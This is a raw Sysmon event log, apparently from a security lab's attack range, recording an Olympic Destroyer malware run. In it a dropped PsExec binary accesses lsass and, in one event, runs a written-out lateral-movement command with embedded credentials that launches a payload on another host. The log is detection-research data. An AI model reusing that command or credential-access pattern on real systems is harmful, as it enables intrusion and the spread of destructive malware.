Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B29CB2DDEC9E78887A9D7167FDAD85F,SHA256=5D2605CD4973A25DE7D61926FADAC1605EA9C9FCB910F3726F6FA8BA3979C464,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.669{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.669{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:01:14.653{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.603{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-13FA-6216-8606-000000003802}6212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.602{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-13FA-6216-8606-000000003802}6212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.569{C8EA50B7-13FA-6216-8606-000000003802}62126492C:\Windows\system32\conhost.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.538{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-13FA-6216-8606-000000003802}6212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.538{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13FA-6216-8606-000000003802}6212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.407{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.403{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.403{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.400{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.398{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.398{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.394{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000294139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:14.032{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE16D97AF3C86A612EBB59178F3685F7,SHA256=1B5797E14C2F8EEE38B13612003442AAA959C755C73F7FD28969A223BB10A2B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:14.555{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-145MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:15.709{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B18C3F19CDEF08DD617F4DAE94B9E54,SHA256=54B1BA9C8343A6B37E647A4A0E0A7096FDDBC74ABF67BDC4B07F2320C455251A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:15.053{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBB2681D9909D8884BC0C9281EDF8163,SHA256=4876294BA2F7CB8986175FB8E54635D5521A4D0505E59AB42BA3FABC767D831B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:16.756{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72253945B19B8144C5D277463982E83,SHA256=C811364C60A25AD53F954EDA58FBA9453233DA46A8E3913CAD366EAE3E1FE3E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:13.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53866-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:16.087{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D63EE152A52A6AFC4DEC184E437F554,SHA256=F12990DDEC5038D8F21ADED515603928E3E546C46ECBF619E563C777F40D98D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:17.819{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6DD07AE6F597D7ADFE6BF4618001809,SHA256=5558332D56F0349F9E9FD070ED4F0A060D066D474B061A9A85734BF5C3EA6772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:17.099{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C55EC2F42D4DE3138D03BF602D218D17,SHA256=4DCF39253CF6FF1E184949F478DC61FD8F8154AA8599D661D15C4B4ED64AF838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:18.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DFA8BC53DF4B8F5760368DF27FC5A32,SHA256=FDD70B05D5FAA4776DF1B5292D85D249D26AD3DDE3243697F8D47284AACD3FD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:18.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36527235164F4A730A1563AC1938E6DE,SHA256=1062C44F0C56E92EBC66D32E74D76AF1732D77DF330106D81C84D0A045AD2A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:19.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F312F6E6BAC7E0E34828B151476C84F,SHA256=756682FB0CD2380ABEC1FD24A64931581423084D0422539DADBC19379FA040CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.740{C8EA50B7-13FF-6216-8706-000000003802}65763112C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13FF-6216-8706-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-13FF-6216-8706-000000003802}6576C:\Program 